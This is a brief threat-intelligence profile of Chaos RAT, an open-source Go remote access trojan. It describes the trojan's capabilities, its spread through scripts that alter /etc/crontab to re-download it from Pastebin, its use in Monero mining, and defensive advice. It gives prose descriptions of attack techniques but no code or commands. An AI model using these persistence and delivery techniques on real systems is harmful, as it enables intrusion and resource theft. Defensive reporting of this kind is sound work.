Golang
RAT
DDoS
Linux
Windows
Trojan
Chaos RAT is a multi-os remote access trojan (RAT) written in Go that can target Windows and Linux. It allows attackers to execute commands, steal data, and control infected machines. Chaos RAT has been used in cryptocurrency mining campaigns to mine Monero (XMR) on compromised machines.
Chaos RAT is an open-source project so attackers can modify and add features. It can execute reverse shells, upload and download files, delete files, take screenshots, access File Explorer, get os info, restart or shut down the system, and open URLs. All these features give attackers full control over compromised machines.
Distribution
In attacks we have seen, Chaos RAT is distributed through malicious scripts that modify the /etc/crontab file on Linux systems to make persistence by downloading the malware every 10 minutes from Pastebin. Additional payloads like XMRig miner and competition-killer scripts are also downloaded to maximize resource usage for cryptocurrency mining.
Evolution and Impact
First seen in November 2022, Chaos RAT has been used in more complex attacks against Linux systems. A RAT in cryptocurrency mining operations is an evolution of attack methods, allowing threat actors to have prolonged access to compromised machines and potentially expand their malicious activities beyond mining.
Update and patch operating systems and software to fix known vulnerabilities.
Implement strict access controls and monitor for unauthorized changes to critical files like /etc/crontab.
Deploy security solutions that can detect and prevent remote access tools.
Educate users about the risks of downloading and executing files from untrusted sources to prevent initial infection vectors.
